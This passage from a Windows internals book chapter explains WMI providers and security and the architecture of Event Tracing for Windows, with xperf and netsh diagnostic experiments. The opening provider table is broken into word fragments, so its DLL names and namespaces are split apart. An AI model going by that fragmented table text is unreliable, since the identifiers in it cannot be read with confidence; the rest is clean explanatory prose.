tory
provi
der
d
s
p
r
o
v.
dl
l
ro
ot\
dir
ect
or
y\l
da
p
Maps Active Directory objects to WMI
Event
Log
provi
der
nt
e
vt
.d
ll
ro
ot\
ci
mv
2
Manages Windows event logs—for example, read,
backup, clear, copy, delete, monitor, rename,
compress, uncompress, and change event log settings
Perfo
rman
ce
Coun
ter
w
b
e
m
p
ro
ot\
ci
mv
2
Provides access to raw performance data
provi
der
er
f.
dl
l
Regis
try
provi
der
st
d
p
r
o
v.
dl
l
ro
ot\
def
aul
t
Reads, writes, enumerates, monitors, creates, and
deletes registry keys and values
Virtu
alizat
ion
provi
der
v
m
m
s
p
r
o
x.
dl
l
ro
ot\
vir
tua
liz
ati
on\
v2
Provides access to virtualization services
implemented in vmms.exe, like managing virtual
machines in the host system and retrieving
information of the host system peripherals from a
guest VM
WD
M
provi
der
w
m
ip
r
o
v.
dl
l
ro
ot\
w
mi
Provides access to information on WDM device
drivers
Win3
2
ci
m
ro
ot\
Provides information about the computer, disks,
peripheral devices, files, folders, file systems,
provi
der
w
in
3
2.
dl
l
ci
mv
2
networking components, operating system, printers,
processes, security, services, shares, SAM users and
groups, and more
Wind
ows
Instal
ler
provi
der
m
si
p
r
o
v.
dl
l
ro
ot\
ci
mv
2
Provides access to information about installed
software
Ntevt.dll, the Event Log provider DLL, is a COM server, registered in the
HKLM\Software\Classes\CLSID registry key with the {F55C5B4C-517D-
11d1-AB57-00C04FD9159E} CLSID. (You can find it in the MOF
descriptor.) Directories beneath %SystemRoot%\System32\Wbem store the
repository, log files, and third-party MOF files. WMI implements the
repository—named the CIMOM object repository—using a proprietary
version of the Microsoft JET database engine. The database file, by default,
resides in SystemRoot%\System32\Wbem\Repository\.
WMI honors numerous registry settings that the service’s
HKLM\SOFTWARE\Microsoft\WBEM\CIMOM registry key stores, such as
thresholds and maximum values for certain parameters.
Device drivers use special interfaces to provide data to and accept
commands—called the WMI System Control commands—from WMI. These
interfaces are part of the WDM, which is explained in Chapter 6 of Part 1.
Because the interfaces are cross-platform, they fall under the \root\WMI
namespace.
WMI security
WMI implements security at the namespace level. If a management
application successfully connects to a namespace, the application can view
and access the properties of all the objects in that namespace. An
administrator can use the WMI Control application to control which users can
access a namespace. Internally, this security model is implemented by using
ACLs and Security Descriptors, part of the standard Windows security model
that implements Access Checks. (See Chapter 7 of Part 1 for more
information on access checks.)
To start the WMI Control application, open the Control Panel by typing
Computer Management in the Cortana search box. Next, open the Services
And Applications node. Right-click WMI Control and select Properties to
launch the WMI Control Properties dialog box, as shown in Figure 10-30. To
configure security for namespaces, click the Security tab, select the
namespace, and click Security. The other tabs in the WMI Control Properties
dialog box let you modify the performance and backup settings that the
registry stores.
Figure 10-30 The WMI Control Properties application and the Security tab
of the root\virtualization\v2 namespace.
Event Tracing for Windows (ETW)
Event Tracing for Windows (ETW) is the main facility that provides to
applications and kernel-mode drivers the ability to provide, consume, and
manage log and trace events. The events can be stored in a log file or in a
circular buffer, or they can be consumed in real time. They can be used for
debugging a driver, a framework like the .NET CLR, or an application and to
understand whether there could be potential performance issues. The ETW
facility is mainly implemented in the NT kernel, but an application can also
use private loggers, which do not transition to kernel-mode at all. An
application that uses ETW can be one of the following categories:
■ Controller A controller starts and stops event tracing sessions,
manages the size of the buffer pools, and enables providers so they
can log events to the session. Example controllers include Reliability
and Performance Monitor and XPerf from the Windows Performance
Toolkit (now part of the Windows Assessment and Deployment Kit,
available for download from https://docs.microsoft.com/en-
us/windows-hardware/get-started/adk-install).
■ Provider A provider is an application or a driver that contains event
tracing instrumentation. A provider registers with ETW a provider
GUID (globally unique identifiers), which defines the events it can
produce. After the registration, the provider can generate events,
which can be enabled or disabled by the controller application
through an associated trace session.
■ Consumer A consumer is an application that selects one or more
trace sessions for which it wants to read trace data. Consumers can
receive events stored in log files, in a circular buffer, or from sessions
that deliver events in real time.
It’s important to mention that in ETW, every provider, session, trait, and
provider’s group is represented by a GUID (more information about these
concepts are provided later in this chapter). Four different technologies used
for providing events are built on the top of ETW. They differ mainly in the
method in which they store and define events (there are other distinctions
though):
■ MOF (or classic) providers are the legacy ones, used especially by
WMI. MOF providers store the events descriptor in MOF classes so
that the consumer knows how to consume them.
■ WPP (Windows software trace processor) providers are used for
tracing the operations of an application or driver (they are an
extension of WMI event tracing) and use a TMF (trace message
format) file for allowing the consumer to decode trace events.
■ Manifest-based providers use an XML manifest file to define events
that can be decoded by the consumer.
■ TraceLogging providers, which, like WPP providers are used for fast
tracing the operation of an application of driver, use self-describing
events that contain all the required information for the consumption
by the controller.
When first installed, Windows already includes dozens of providers, which
are used by each component of the OS for logging diagnostics events and
performance traces. For example, Hyper-V has multiple providers, which
provide tracing events for the Hypervisor, Dynamic Memory, Vid driver, and
Virtualization stack. As shown in Figure 10-31, ETW is implemented in
different components:
■ Most of the ETW implementation (global session creation, provider
registration and enablement, main logger thread) resides in the NT
kernel.
■ The Host for SCM/SDDL/LSA Lookup APIs library (sechost.dll)
provides to applications the main user-mode APIs used for creating an
ETW session, enabling providers and consuming events. Sechost uses
services provided by Ntdll to invoke ETW in the NT kernel. Some
ETW user-mode APIs are implemented directly in Ntdll without
exposing the functionality to Sechost. Provider registration and events
generation are examples of user-mode functionalities that are
implemented in Ntdll (and not in Sechost).
■ The Event Trace Decode Helper Library (TDH.dll) implements
services available for consumers to decode ETW events.
■ The Eventing Consumption and Configuration library (WevtApi.dll)
implements the Windows Event Log APIs (also known as Evt APIs),
which are available to consumer applications for managing providers
and events on local and remote machines. Windows Event Log APIs
support XPath 1.0 or structured XML queries for parsing events
produced by an ETW session.
■ The Secure Kernel implements basic secure services able to interact
with ETW in the NT kernel that lives in VTL 0. This allows trustlets
and the Secure Kernel to use ETW for logging their own secure
events.
Figure 10-31 ETW architecture.
ETW initialization
The ETW initialization starts early in the NT kernel startup (for more details
on the NT kernel initialization, see Chapter 12). It is orchestrated by the
internal EtwInitialize function in three phases. The phase 0 of the NT kernel
initialization calls EtwInitialize to properly allocate and initialize the per-silo
ETW-specific data structure that stores the array of logger contexts
representing global ETW sessions (see the “ETW session” section later in
this chapter for more details). The maximum number of global sessions is
queried from the
HKLM\System\CurrentControlSet\Control\WMI\EtwMaxLoggers registry
value, which should be between 32 and 256, (64 is the default number in case
the registry value does not exist).
Later, in the NT kernel startup, the IoInitSystemPreDrivers routine of
phase 1 continues with the initialization of ETW, which performs the
following steps:
1.
Acquires the system startup time and reference system time and
calculates the QPC frequency.
2.
Initializes the ETW security key and reads the default session and
provider’s security descriptor.
3.
Initializes the per-processor global tracing structures located in the
PRCB.
4.
Creates the real-time ETW consumer object type (called
EtwConsumer), which is used to allow a user-mode real-time
consumer process to connect to the main ETW logger thread and the
ETW registration (internally called EtwRegistration) object type,
which allow a provider to be registered from a user-mode application.
5.
Registers the ETW bugcheck callback, used to dump logger sessions
data in the bugcheck dump.
6.
Initializes and starts the Global logger and Autologgers sessions,
based on the AutoLogger and GlobalLogger registry keys located
under the HKLM\System\CurrentControlSet\Control\WMI root key.
7.
Uses the EtwRegister kernel API to register various NT kernel event
providers, like the Kernel Event Tracing, General Events provider,
Process, Network, Disk, File Name, IO, and Memory providers, and
so on.
8.
Publishes the ETW initialized WNF state name to indicate that the
ETW subsystem is initialized.
9.
Writes the SystemStart event to both the Global Trace logging and
General Events providers. The event, which is shown in Figure 10-32,
logs the approximate OS Startup time.
10.
If required, loads the FileInfo driver, which provides supplemental
information on files I/O to Superfetch (more information on the
Proactive memory management is available in Chapter 5 of Part 1).
Figure 10-32 The SystemStart ETW event displayed by the Event Viewer.
In early boot phases, the Windows registry and I/O subsystems are still not
completely initialized. So ETW can’t directly write to the log files. Late in
the boot process, after the Session Manager (SMSS.exe) has correctly
initialized the software hive, the last phase of ETW initialization takes place.
The purpose of this phase is just to inform each already-registered global
ETW session that the file system is ready, so that they can flush out all the
events that are recorded in the ETW buffers to the log file.
ETW sessions
One of the most important entities of ETW is the Session (internally called
logger instance), which is a glue between providers and consumers. An event
tracing session records events from one or more providers that a controller
has enabled. A session usually contains all the information that describes
which events should be recorded by which providers and how the events
should be processed. For example, a session might be configured to accept all
events from the Microsoft-Windows-Hyper-V-Hypervisor provider (which is
internally identified using the {52fc89f8-995e-434c-a91e-199986449890}
GUID). The user can also configure filters. Each event generated by a
provider (or a provider group) can be filtered based on event level
(information, warning, error, or critical), event keyword, event ID, and other
characteristics. The session configuration can also define various other details
for the session, such as what time source should be used for the event
timestamps (for example, QPC, TSC, or system time), which events should
have stack traces captured, and so on. The session has the important rule to
host the ETW logger thread, which is the main entity that flushes the events
to the log file or delivers them to the real-time consumer.
Sessions are created using the StartTrace API and configured using
ControlTrace and EnableTraceEx2. Command-line tools such as xperf,
logman, tracelog, and wevtutil use these APIs to start or control trace
sessions. A session also can be configured to be private to the process that
creates it. In this case, ETW is used for consuming events created only by the
same application that also acts as provider. The application thus eliminates
the overhead associated with the kernel-mode transition. Private ETW
sessions can record only events for the threads of the process in which it is
executing and cannot be used with real-time delivery. The internal
architecture of private ETW is not described in this book.
When a global session is created, the StartTrace API validates the
parameters and copies them in a data structure, which the NtTraceControl
API uses to invoke the internal function EtwpStartLogger in the kernel. An
ETW session is represented internally through an
ETW_LOGGER_CONTEXT data structure, which contains the important
pointers to the session memory buffers, where the events are written to. As
discussed in the “ETW initialization” section, a system can support a limited
number of ETW sessions, which are stored in an array located in a global
per-SILO data structure. EtwpStartLogger checks the global sessions array,
determining whether there is free space or if a session with the same name
already exists. If that is the case, it exits and signals an error. Otherwise, it
generates a session GUID (if not already specified by the caller), allocates
and initializes an ETW_LOGGER_CONTEXT data structure representing the
session, assigns to it an index, and inserts it in the per-silo array.
ETW queries the session’s security descriptor located in the
HKLM\System\CurrentControlSet\Control\Wmi\Security registry key. As
shown in Figure 10-33, each registry value in the key is named as the session
GUID (the registry key, however, also contains the provider’s GUID) and
contains the binary representation of a self-relative security descriptor. If a
security descriptor for the session does not exist, a default one is returned for
the session (see the “Witnessing the default security descriptor of ETW
sessions” experiment later in this chapter for details).
Figure 10-33 The ETW security registry key.
The EtwpStartLogger function performs an access check on the session’s
security descriptor, requesting the TRACELOG_GUID_ENABLE access right
(and the TRACELOG_CREATE_REALTIME or
TRACELOG_CREATE_ONDISK depending on the log file mode) using the
current process’s access token. If the check succeeds, the routine calculates
the default size and numbers of event buffers, which are calculated based on
the size of the system physical memory (the default buffer size is 8, 16, or
64KB). The number of buffers depends on the number of system processors
and on the presence of the
EVENT_TRACE_NO_PER_PROCESSOR_BUFFERING logger mode flag,
which prevents events (which can be generated from different processors) to
be written to a per-processor buffer.
ETW acquires the session’s initial reference time stamp. Three clock
resolutions are currently supported: Query performance counter (QPC, a
high-resolution time stamp not affected by the system clock), System time,
and CPU cycle counter. The EtwpAllocateTraceBuffer function is used to
allocate each buffer associated with the logger session (the number of buffers
was calculated before or specified as input from the user). A buffer can be
allocated from the paged pool, nonpaged pool, or directly from physical large
pages, depending on the logging mode. Each buffer is stored in multiple
internal per-session lists, which are able to provide fast lookup both to the
ETW main logger thread and ETW providers. Finally, if the log mode is not
set to a circular buffer, the EtwpStartLogger function starts the main ETW
logger thread, which has the goal of flushing events written by the providers
associated with the session to the log file or to the real-time consumer. After
the main thread is started, ETW sends a session notification to the registered
session notification provider (GUID 2a6e185b-90de-4fc5-826c-
9f44e608a427), a special provider that allows its consumers to be informed
when certain ETW events happen (like a new session being created or
destroyed, a new log file being created, or a log error being raised).
EXPERIMENT: Enumerating ETW sessions
In Windows 10, there are multiple ways to enumerate active ETW
sessions. In this and all the next experiments regarding ETW, you
will use the XPERF tool, which is part of the Windows
Performance Toolkit distributed in the Windows Assessment and
Deployment Kit (ADK), which is freely downloadable from
https://docs.microsoft.com/en-us/windows-hardware/get-
started/adk-install.
Enumerating active ETW sessions can be done in multiple ways.
XPERF can do it while executed with the following command
(usually XPERF is installed in C:\Program Files (x86)\Windows
Kits\10\Windows Performance Toolkit):
xperf -Loggers
The output of the command can be huge, so it is strongly advised
to redirect the output in a TXT file:
Click here to view code image
xperf -Loggers > ETW_Sessions.txt
The tool can decode and show in a human-readable form all the
session configuration data. An example is given from the
EventLog-Application session, which is used by the Event logger
service (Wevtsvc.dll) to write events in the Application.evtx file
shown by the Event Viewer:
Click here to view code image
Logger Name : EventLog-Application
Logger Id : 9
Logger Thread Id : 000000000000008C
Buffer Size : 64
Maximum Buffers : 64
Minimum Buffers : 2
Number of Buffers : 2
Free Buffers : 2
Buffers Written : 252
Events Lost : 0
Log Buffers Lost : 0
Real Time Buffers Lost: 0
Flush Timer : 1
Age Limit : 0
Real Time Mode : Enabled
Log File Mode : Secure PersistOnHybridShutdown
PagedMemory IndependentSession
NoPerProcessorBuffering
Maximum File Size : 100
Log Filename :
Trace Flags : "Microsoft-Windows-
CertificateServicesClient-Lifecycle-User":0x800
0000000000000:0xff+"Microsoft-Windows-
SenseIR":0x8000000000000000:0xff+
... (output cut for space reasons)
The tool is also able to decode the name of each provider
enabled in the session and the bitmask of event categories that the
provider should write to the sessions. The interpretation of the
bitmask (shown under “Trace Flags”) depends on the provider. For
example, a provider can define that the category 1 (bit 0 set)
indicates the set of events generated during initialization and
cleanup, category 2 (bit 1 set) indicates the set of events generated
when registry I/O is performed, and so on. The trace flags are
interpreted differently for System sessions (see the “System
loggers” section for more details.) In that case, the flags are
decoded from the enabled kernel flags that specify which kind of
kernel events the system session should log.
The Windows Performance Monitor, in addition to dealing with
system performance counters, can easily enumerate the ETW
sessions. Open Performance Monitor (by typing perfmon in the
Cortana search box), expand the Data Collector Sets, and click
Event Trace Sessions. The application should list the same sessions
listed by XPERF. If you right-click a session’s name and select
Properties, you should be able to navigate between the session’s
configurations. In particular, the Security property sheet decodes
the security descriptor of the ETW session.
Finally, you also can use the Microsoft Logman console tool
(%SystemRoot%\System32\logman.exe) to enumerate active ETW
sessions (by using the -ets command-line argument).
ETW providers
As stated in the previous sections, a provider is a component that produces
events (while the application that includes the provider contains event tracing
instrumentation). ETW supports different kinds of providers, which all share
a similar programming model. (They are mainly different in the way in which
they encode events.) A provider must be initially registered with ETW before
it can generate any event. In a similar way, a controller application should
enable the provider and associate it with an ETW session to be able to receive
events from the provider. If no session has enabled a provider, the provider
will not generate any event. The provider defines its interpretation of being
enabled or disabled. Generally, an enabled provider generates events, and a
disabled provider does not.
Providers registration
Each provider’s type has its own API that needs to be called by a provider
application (or driver) for registering a provider. For example, manifest-based
providers rely on the EventRegister API for user-mode registrations, and
EtwRegister for kernel-mode registrations. All the provider types end up
calling the internal EtwpRegisterProvider function, which performs the actual
registration process (and is implemented in both the NT kernel and NTDLL).
The latter allocates and initializes an ETW_GUID_ENTRY data structure,
which represents the provider (the same data structure is used for
notifications and traits). The data structure contains important information,
like the provider GUID, security descriptor, reference counter, enablement
information (for each ETW session that enables the provider), and a list of
provider’s registrations.
For user-mode provider registrations, the NT kernel performs an access
check on the calling process’s token, requesting the
TRACELOG_REGISTER_GUIDS access right. If the check succeeds, or if
the registration request originated from kernel code, ETW inserts the new
ETW_GUID_ENTRY data structure in a hash table located in the global ETW
per-silo data structure, using a hash of the provider’s GUID as the table’s key
(this allows fast lookup of all the providers registered in the system.) In case
an entry with the same GUID already exists in the hash table, ETW uses the
existing entry instead of the new one. A GUID could already exist in the hash
table mainly for two reasons:
■ Another driver or application has enabled the provider before it has
been actually registered (see the “Providers enablement” section later
in this chapter for more details) .
■ The provider has been already registered once. Multiple registration
of the same provider GUID are supported.
After the provider has been successfully added into the global list, ETW
creates and initializes an ETW registration object, which represents a single
registration. The object encapsulates an ETW_REG_ENTRY data structure,
which ties the provider to the process and session that requested its
registration. (ETW also supports registration from different sessions.) The
object is inserted in a list located in the ETW_GUID_ENTRY (the
EtwRegistration object type has been previously created and registered with
the NT object manager at ETW initialization time). Figure 10-34 shows the
two data structures and their relationships. In the figure, two providers’
processes (process A, living in session 4, and process B, living in session 16)
have registered for provider 1. Thus two ETW_REG_ENTRY data structures
have been created and linked to the ETW_GUID_ENTRY representing
provider 1.
Figure 10-34 The ETW_GUID_ENTRY data structure and the
ETW_REG_ENTRY.
At this stage, the provider is registered and ready to be enabled in the
session(s) that requested it (through the EnableTrace API). In case the
provider has been already enabled in at least one session before its
registration, ETW enables it (see the next section for details) and calls the
Enablement callback, which can be specified by the caller of the
EventRegister (or EtwRegister) API that started the registration process.
EXPERIMENT: Enumerating ETW providers
As for ETW sessions, XPERF can enumerate the list of all the
current registered providers (the WEVTUTIL tool, installed with
Windows, can do the same). Open an administrative command
prompt window and move to the Windows Performance Toolkit
path. To enumerate the registered providers, use the -providers
command option. The option supports different flags. For this
experiment, you will be interested in the I and R flags, which tell
XPERF to enumerate the installed or registered providers. As we
will discuss in the “Decoding events” section later in this chapter,
the difference is that a provider can be registered (by specifying a
GUID) but not installed in the
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEV
T\Publishers registry key. This will prevent any consumer from
decoding the event using TDH routines. The following commands
Click here to view code image
cd /d “C:\Program Files (x86)\Windows Kits\10\Windows
Performance Toolkit”
xperf -providers R > registered_providers.txt
xperf -providers I > installed_providers.txt
produce two text files with similar information. If you open the
registered_providers.txt file, you will find a mix of names and
GUIDs. Names identify providers that are also installed in the
Publisher registry key, whereas GUID represents providers that
have just been registered through the EventRegister API discussed
in this section. All the names are present also in the
installed_providers.txt file with their respective GUIDs, but you
won’t find any GUID listed in the first text file in the installed
providers list.
XPERF also supports the enumeration of all the kernel flags and
groups supported by system loggers (discussed in the “System
loggers” section later in this chapter) through the K flag (which is a
superset of the KF and KG flags).
Provider Enablement
As introduced in the previous section, a provider should be associated with an
ETW session to be able to generate events. This association is called Provider
Enablement, and it can happen in two ways: before or after the provider is
registered. A controller application can enable a provider on a session
through the EnableTraceEx API. The API allows you to specify a bitmask of
keywords that determine the category of events that the session wants to
receive. In the same way, the API supports advanced filters on other kinds of
data, like the process IDs that generate the events, package ID, executable
name, and so on. (You can find more information at
https://docs.microsoft.com/en-us/windows/win32/api/evntprov/ns-evntprov-
event_filter_descriptor.)
Provider Enablement is managed by ETW in kernel mode through the
internal EtwpEnableGuid function. For user-mode requests, the function
performs an access check on both the session and provider security
descriptors, requesting the TRACELOG_GUID_ENABLE access right on
behalf of the calling process’s token. If the logger session includes the
SECURITY_TRACE flag, EtwpEnableGuid requires that the calling process
is a PPL (see the “ETW security” section later in this chapter for more
details). If the check succeeds, the function performs a similar task to the one
discussed previously for provider registrations:
■ It allocates and initializes an ETW_GUID_ENTRY data structure to
represent the provider or use the one already linked in the global
ETW per-silo data structure in case the provider has been already
registered.
■ Links the provider to the logger session by adding the relative session
enablement information in the ETW_GUID_ENTRY.
In case the provider has not been previously registered, no ETW
registration object exists that’s linked in the ETW_GUID_ENTRY data
structure, so the procedure terminates. (The provider will be enabled after it
is first registered.) Otherwise, the provider is enabled.
While legacy MOF providers and WPP providers can be enabled only to
one session at time, Manifest-based and Tracelogging providers can be
enabled on a maximum of eight sessions. As previously shown in Figure 10-
32, the ETW_GUID_ENTRY data structure contains enablement information
for each possible ETW session that enabled the provider (eight maximum).
Based on the enabled sessions, the EtwpEnableGuid function calculates a
new session enablement mask, storing it in the ETW_REG_ENTRY data
structure (representing the provider registration). The mask is very important
because it’s the key for event generations. When an application or driver
writes an event to the provider, a check is made: if a bit in the enablement
mask equals 1, it means that the event should be written to the buffer
maintained by a particular ETW session; otherwise, the session is skipped
and the event is not written to its buffer.
Note that for secure sessions, a supplemental access check is performed
before updating the session enablement mask in the provider registration.
The ETW session’s security descriptor should allow the
TRACELOG_LOG_EVENT access right to the calling process’s access token.
Otherwise, the relative bit in the enablement mask is not set to 1. (The target
ETW session will not receive any event from the provider registration.) More
information on secure sessions is available in the “Secure loggers and ETW
security” section later in this chapter.
Providing events
After registering one or more ETW providers, a provider application can start
to generate events. Note that events can be generated even though a controller
application hasn’t had the chance to enable the provider in an ETW session.
The way in which an application or driver can generate events depends on the
type of the provider. For example, applications that write events to manifest-
based providers usually directly create an event descriptor (which respects the
XML manifest) and use the EventWrite API to write the event to the ETW
sessions that have the provider enabled. Applications that manage MOF and
WPP providers rely on the TraceEvent API instead.
Events generated by manifest-based providers, as discussed previously in
the “ETW session” section, can be filtered by multiple means. ETW locates
the ETW_GUID_ENTRY data structure from the provider registration object,
which is provided by the application through a handle. The internal
EtwpEventWriteFull function uses the provider’s registration session
enablement mask to cycle between all the enabled ETW sessions associated
with the provider (represented by an ETW_LOGGER_CONTEXT). For each
session, it checks whether the event satisfies all the filters. If so, it calculates
the full size of the event’s payload and checks whether there is enough free
space in the session’s current buffer.
If there is no available space, ETW checks whether there is another free
buffer in the session: free buffers are stored in a FIFO (first-in, first-out)
queue. If there is a free buffer, ETW marks the old buffer as “dirty” and
switches to the new free one. In this way, the Logger thread can wake up and
flush the entire buffer to a log file or deliver it to a real-time consumer. If the
session’s log mode is a circular logger, no logger thread is ever created: ETW
simply links the old full buffer at the end of the free buffers queue (as a result
the queue will never be empty). Otherwise, if there isn’t a free buffer in the
queue, ETW tries to allocate an additional buffer before returning an error to
the caller.
After enough space in a buffer is found, EtwpEventWriteFull atomically
writes the entire event payload in the buffer and exits. Note that in case the
session enablement mask is 0, it means that no sessions are associated with
the provider. As a result, the event is lost and not logged anywhere.
MOF and WPP events go through a similar procedure but support only a
single ETW session and generally support fewer filters. For these kinds of
providers, a supplemental check is performed on the associated session: If the
controller application has marked the session as secure, nobody can write any
events. In this case, an error is yielded back to the caller (secure sessions are
discussed later in the “Secure loggers and ETW security” section).
EXPERIMENT: Listing processes activity using ETW
In this experiment, will use ETW to monitor system’s processes
activity. Windows 10 has two providers that can monitor this
information: Microsoft-Windows-Kernel-Process and the NT
kernel logger through the PROC_THREAD kernel flags. You will
use the former, which is a classic provider and already has all the
information for decoding its events. You can capture the trace with
multiple tools. You still use XPERF (Windows Performance
Monitor can be used, too).
Open a command prompt window and type the following
commands:
Click here to view code image
cd /d “C:\Program Files (x86)\Windows Kits\10\Windows
Performance Toolkit”
xperf -start TestSession -on Microsoft-Windows-Kernel-
Process -f c:\process_trace.etl
The command starts an ETW session called TestSession (you
can replace the name) that will consume events generated by the
Kernel-Process provider and store them in the C:\process_trace.etl
log file (you can also replace the file name).
To verify that the session has actually started, repeat the steps
described previously in the “Enumerating ETW sessions”
experiment. (The TestSession trace session should be listed by both
XPERF and the Windows Performance Monitor.) Now, you should
start some new processes or applications (like Notepad or Paint, for
example).
To stop the ETW session, use the following command:
xperf -stop TestSession
The steps used for decoding the ETL file are described later in
the “Decoding an ETL file” experiment. Windows includes
providers for almost all its components. The Microsoft-Windows-
MSPaint provider, for example, generates events based on Paint’s
functionality. You can try this experiment by capturing events from
the MsPaint provider.
ETW Logger thread
The Logger thread is one of the most important entities in ETW. Its main
purpose is to flush events to the log file or deliver them to the real-time
consumer, keeping track of the number of delivered and lost events. A logger
thread is started every time an ETW session is initially created, but only in
case the session does not use the circular log mode. Its execution logic is
simple. After it’s started, it links itself to the ETW_LOGGER_CONTEXT data
structure representing the associated ETW session and waits on two main
synchronization objects. The Flush event is signaled by ETW every time a
buffer belonging to a session becomes full (which can happen after a new
event has been generated by a provider—for example, as discussed in the
previous section, “Providing events”), when a new real-time consumer has
requested to be connected, or when a logger session is going to be stopped.
The TimeOut timer is initialized to a valid value (usually 1 second) only in
case the session is a real-time one or in case the user has explicitly required it
when calling the StartTrace API for creating the new session.
When one of the two synchronization objects is signaled, the logger thread
rearms them and checks whether the file system is ready. If not, the main
logger thread returns to sleep again (no sessions should be flushed in early
boot stages). Otherwise, it starts to flush each buffer belonging to the session
to the log file or the real-time consumer.
For real-time sessions, the logger thread first creates a temporary per-
session ETL file in the %SystemRoot%\ System32\LogFiles\WMI\RtBackup
folder (as shown in Figure 10-35.) The log file name is generated by adding
the EtwRT prefix to the name of the real-time session. The file is used for
saving temporary events before they are delivered to a real-time consumer
(the log file can also store lost events that have not been delivered to the
consumer in the proper time frame). When started, real-time auto-loggers
restore lost events from the log file with the goal of delivering them to their
consumer.
Figure 10-35 Real-time temporary ETL log files.
The logger thread is the only entity able to establish a connection between
a real-time consumer and the session. The first time that a consumer calls the
ProcessTrace API for receiving events from a real-time session, ETW sets up
a new RealTimeConsumer object and uses it with the goal of creating a link
between the consumer and the real-time session. The object, which resolves
to an ETW_REALTIME_CONSUMER data structure in the NT kernel, allows
events to be “injected” in the consumer’s process address space (another
user-mode buffer is provided by the consumer application).
For non–real-time sessions, the logger thread opens (or creates, in case the
file does not exist) the initial ETL log file specified by the entity that created
the session. The logger thread can also create a brand-new log file in case the
session’s log mode specifies the EVENT_TRACE_FILE_MODE_NEWFILE
flag, and the current log file reaches the maximum size.
At this stage, the ETW logger thread initiates a flush of all the buffers
associated with the session to the current log file (which, as discussed, can be
a temporary one for real-time sessions). The flush is performed by adding an
event header to each event in the buffer and by using the NtWriteFile API for
writing the binary content to the ETL log file. For real-time sessions, the next
time the logger thread wakes up, it is able to inject all the events stored in the
temporary log file to the target user-mode real-time consumer application.
Thus, for real-time sessions, ETW events are never delivered synchronously.
Consuming events
Events consumption in ETW is performed almost entirely in user mode by a
consumer application, thanks to the services provided by the Sechost.dll. The
consumer application uses the OpenTrace API for opening an ETL log file
produced by the main logger thread or for establishing the connection to a
real-time logger. The application specifies an event callback function, which
is called every time ETW consumes a single event. Furthermore, for real-time
sessions, the application can supply an optional buffer-callback function,
which receives statistics for each buffer that ETW flushes and is called every
time a single buffer is full and has been delivered to the consumer.
The actual event consumption is started by the ProcessTrace API. The API
works for both standard and real-time sessions, depending on the log file
mode flags passed previously to OpenTrace.
For real-time sessions, the API uses kernel mode services (accessed
through the NtTraceControl system call) to verify that the ETW session is
really a real-time one. The NT kernel verifies that the security descriptor of
the ETW session grants the TRACELOG_ACCESS_REALTIME access right
to the caller process’s token. If it doesn’t have access, the API fails and
returns an error to the controller application. Otherwise, it allocates a
temporary user-mode buffer and a bitmap used for receiving events and
connects to the main logger thread (which creates the associated
EtwConsumer object; see the “ETW logger thread” section earlier in this
chapter for details). Once the connection is established, the API waits for
new data arriving from the session’s logger thread. When the data comes, the
API enumerates each event and calls the event callback.
For normal non–real-time ETW sessions, the ProcessTrace API performs
a similar processing, but instead of connecting to the logger thread, it just
opens and parses the ETL log file, reading each buffer one by one and calling
the event callback for each found event (events are sorted in chronological
order). Differently from real-time loggers, which can be consumed one per
time, in this case the API can work even with multiple trace handles created
by the OpenTrace API, which means that it can parse events from different
ETL log files.
Events belonging to ETW sessions that use circular buffers are not
processed using the described methodology. (There is indeed no logger
thread that dumps any event.) Usually a controller application uses the
FlushTrace API when it wants to dump a snapshot of the current buffers
belonging to an ETW session configured to use a circular buffer into a log
file. The API invokes the NT kernel through the NtTraceControl system call,
which locates the ETW session and verifies that its security descriptor grants
the TRACELOG_CREATE_ONDISK access right to the calling process’s
access token. If so, and if the controller application has specified a valid log
file name, the NT kernel invokes the internal EtwpBufferingModeFlush
routine, which creates the new ETL file, adds the proper headers, and writes
all the buffers associated with the session. A consumer application can then
parse the events written in the new log file by using the OpenTrace and
ProcessTrace APIs, as described earlier.
Events decoding
When the ProcessTrace API identifies a new event in an ETW buffer, it calls
the event callback, which is generally located in the consumer application. To
be able to correctly process the event, the consumer application should
decode the event payload. The Event Trace Decode Helper Library (TDH.dll)
provides services to consumer applications for decoding events. As discussed
in the previous sections, a provider application (or driver), should include
information that describes how to decode the events generated by its
registered providers.
This information is encoded differently based on the provider type.
Manifest-based providers, for example, compile the XML descriptor of their
events in a binary file and store it in the resource section of their provider
application (or driver). As part of provider registration, a setup application
should register the provider’s binary in the
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publish
ers registry key. The latter is important for event decoding, especially for the
following reasons:
■ The system consults the Publishers key when it wants to resolve a
provider name to its GUID (from an ETW point of view, providers do
not have a name). This allows tools like Xperf to display readable
provider names instead of their GUIDs.
■ The Trace Decode Helper Library consults the key to retrieve the
provider’s binary file, parse its resource section, and read the binary
content of the events descriptor.
After the event descriptor is obtained, the Trace Decode Helper Library
gains all the needed information for decoding the event (by parsing the
binary descriptor) and allows consumer applications to use the
TdhGetEventInformation API to retrieve all the fields that compose the
event’s payload and the correct interpretation the data associated with them.
TDH follows a similar procedure for MOF and WPP providers (while
TraceLogging incorporates all the decoding data in the event payload, which
follows a standard binary format).
Note that all events are natively stored by ETW in an ETL log file, which
has a well-defined uncompressed binary format and does not contain event
decoding information. This means that if an ETL file is opened by another
system that has not acquired the trace, there is a good probability that it will
not be able to decode the events. To overcome these issues, the Event Viewer
uses another binary format: EVTX. This format includes all the events and
their decoding information and can be easily parsed by any application. An
application can use the EvtExportLog Windows Event Log API to save the
events included in an ETL file with their decoding information in an EVTX
file.
EXPERIMENT: Decoding an ETL file
Windows has multiple tools that use the EvtExportLog API to
automatically convert an ETL log file and include all the decoding
information. In this experiment, you use netsh.exe, but
TraceRpt.exe also works well:
1.
Open a command prompt and move to the folder where the
ETL file produced by the previous experiment (“Listing
processes activity using ETW”) resides and insert
Click here to view code image
netsh trace convert input=process_trace.etl
output=process_trace.txt dump=txt
overwrite=yes
2.
where process_trace.etl is the name of the input log file,
and process_trace.txt file is the name of the output
decoded text file.
3.
If you open the text file, you will find all the decoded events
(one for each line) with a description, like the following:
Click here to view code image
[2]1B0C.1154::2020-05-01 12:00:42.075601200
[Microsoft-Windows-Kernel-Process]
Process 1808 started at time 2020 - 05 -
01T19:00:42.075562700Z by parent 6924
running in session 1 with name
\Device\HarddiskVolume4\Windows\System32\notepad.
exe.
4.
From the log, you will find that rarely some events are not
decoded completely or do not contain any description. This
is because the provider manifest does not include the
needed information (a good example is given from the
ThreadWorkOnBehalfUpdate event). You can get rid of
those events by acquiring a trace that does not include their
